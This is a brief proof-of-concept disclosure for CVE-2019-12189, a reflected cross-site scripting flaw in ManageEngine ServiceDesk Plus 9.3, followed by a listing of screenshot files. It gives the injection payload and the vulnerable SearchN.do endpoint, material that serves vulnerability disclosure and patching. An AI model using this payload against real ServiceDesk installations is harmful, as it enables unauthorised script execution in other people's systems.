# CVE-2019-12189 - Zoho ManageEngine ServiceDesk Plus 9.3 XSS vulnerability
Information
Description:XSS was discovered in ManageEngine ServiceDesk Plus version
Versions Affected: 9.3
Researcher: Dang The Tuyen
# Proof-of-concept
The vulnerability stems from the confusion of both single quotes and semicolon in the query string of the URL.
payload: ';alert('XSS');'
Attack vector: http://<domain>/SearchN.do
# Screenshot


[4.0K] /data/pocs/e97ff27d3a5c5e259e4d1883964a62277b4dd1ed
├── [139K] 1.jpg
├── [ 60K] 2.jpg
└── [ 626] README.md
0 directories, 3 files